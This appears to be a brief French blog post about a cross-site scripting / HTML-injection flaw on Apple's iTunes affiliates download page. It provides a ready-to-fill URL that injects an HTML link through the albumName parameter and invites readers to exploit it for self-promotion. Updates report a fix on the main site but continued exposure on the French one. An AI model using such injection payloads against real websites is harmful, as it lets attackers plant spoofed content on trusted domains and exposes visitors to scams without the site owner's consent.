C’est le petit amusement de la soirée sur Twitter, suite à la découverte d’une faille XSS au sein du site web d’Apple, chacun fait sa petite promo en exploitant cette “petite” faille (plus gênante pour des internautes pouvant être victimes de scamming)… On s’occupe comme on peut hein… ^^
Pour tester cette faille il vous suffit de personnaliser l’URL suivante en remplaçant les éléments en gras :
http://www.apple.com/itunes/affiliates/download/?artistName=VOTRE_PSEUDO&thumbnailUrl=URL_DE_VOTRE_IMAGE&itmsUrl=URL_DE_VOTRE_BLOG&albumName=<a href=”URL_DE_VOTRE_BLOG“>TITRE_DE_VOTRE_BLOG</a>
[MAJ] Le problème a rapidement été corrigé, l’exploit ne fonctionne plus. Belle réactivité de la part d’Apple!
[MAJ2] Sur le site FR cela fonctionne toujours ^^
